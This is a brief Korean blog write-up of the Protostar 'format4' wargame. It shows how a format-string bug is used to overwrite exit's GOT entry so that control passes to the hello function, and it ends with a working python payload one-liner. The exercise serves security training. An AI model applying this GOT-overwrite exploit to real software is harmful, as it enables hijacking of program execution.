이번에는 함수의 흐름을 FSB로 바꾸는 문제입니다.
exit 함수를 hello 함수로 redirect 시키라고 하네요.
시키는대로 objdump -TR로 exit 함수의 코드 주소를 확인해봅니다.
근데 굳이 이 주소가 아니더라고 GOT를 덮어씌워도 될 것 같습니다.
hello 함수의 주소도 확인해봅니다.
포맷을 4번 출력했을 때 AAAA가 나타납니다.
exit : 0x08049724
hello : 0x80484b4(134513844)
134513844 - 20 = 134513824
(python -c "print '\x24\x97\x04\x08'+'%08x'*2+'%134513824x%n'") | ./format4
'Wargame > Protostar:Exploit-Exercises' 카테고리의 다른 글
| [Protostar : Exploit-Exercises] Heap1 (0) | 2016.09.25 |
|---|---|
| [Protostar : Exploit-Exercises] Heap0 (0) | 2016.09.25 |
| [Protostar : Exploit-Exercises] Format3 (0) | 2016.09.24 |
| [Protostar : Exploit-Exercises] Format2 (0) | 2016.09.24 |
| [Protostar : Exploit-Exercises] Format1 (0) | 2016.09.24 |